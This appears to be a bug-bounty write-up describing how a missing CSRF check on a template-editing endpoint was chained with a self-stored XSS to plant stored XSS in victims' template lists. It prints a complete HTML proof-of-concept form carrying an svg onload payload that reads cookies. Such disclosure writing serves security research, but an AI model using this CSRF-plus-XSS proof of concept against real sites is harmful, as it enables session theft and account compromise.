CSRF Attack can lead to Stored XSS

Heeeeeey guys, I’m here again with a new write up about CSRF with XSS :P.

First a few days ago I was testing a website lets call it example.com and I found a subdomain on this website which includes some functions so I start to test it I found a Self-Stored XSS on a description field which allows HTML tags and I found a CSRF attack to add the XSS payload but there is a problem I should get the template ID to edit it and I can’t Brute Force it on this time I left it alone, nowadays when I return to test I opened my Burp and caught requests I found an interesting request I sent it to Repeater and sent it again and I found that a new template added to my template list WOW this is good, I scanned the request and I didn’t found any CSRF protection

the cool thing in the request include the template ID which I can use it to add some contents on the template fields in this time I remembered the old bug which is Self-Stored XSS so I tried to exploit these two bugs together to get Strored XSS I created an HTML file as POC this is the code

<form action="https://subdomain.example.com/endpoint" method="POST">
<input type="text" name="svcid" value="WRKSPC_LAYER_SERVICE"><br>
<input type="text" name="stok" value=""><br>
<input type="text" name="v" value="0"><br>
<input type="text" name="clientType" value=""><br>
<input type="text" name="request" value='{"basePage":{"draftIds":["1514844016810"],"wsId":"-1","wsType":"-1"},"fields":{"title":"CSRF_1","bold":"false"},"fields":{"description":"<font rwr=\"1\" style=\"font-family:Arial\" size=\"4\"><br>\"&gt;<svg onload=\"alert(cookie)\">\n</svg></font>","rteMode":"0"},"mode":"INDIVIDUAL","action":"SAVE","layerName":"EDITPANE","variation":null,"currencyInfo":{"currencySymbolLeft":true,"singularName":"U.S. dollars","moneySymbol":"$","decimalSymbol":".","groupingSymbol":",","gS":",","decimalPlaces":"2","currencyCode":"USD","pluralName":"U.S. dollar"},"singleList":true,"listingMode":"AddItem","updateRequired":true,"customFields":{},"byPassUpdate":false,"sellerType":"C2C","saveUlsi":true,"edpCrNew":false,"deletedFields":[],"customAttributes":{"PL_SELLER_ELIGIBLE":"1","PL_FORMAT_ELIGIBLE":"1","PL_CATEGORY_ELIGIBLE":"1","PL_ALREADY_OPTED":"0"},"draftMode":"Listing","restricted":false,"customPreference":{"preferences":{"scheduleStartTime":true,"reservePrice":true,"sellAsLot":true,"privateListing":true,"salesTax":true},"sellerDetails":["BUSINESS_POLICY","NO_STORE_SUBSCRIPTION","NO_SHIPPING_DISCOUNTS","NON_SM_SELLER"]},"payments20":false,"templateId":5553489011,"isvShown":false}'><br>
<input type="submit" value="send">

this code will send a request to edit a template with id 1514844016810 so the server will not found a template with this id so he will create it and add the new value which is the XSS payload which added to the description, when the victim visits his template list he will found a new one so he will open it and BOOOM the XSS payload will be executed, I was:

I hope you enjoy it guys goodbye see you soon.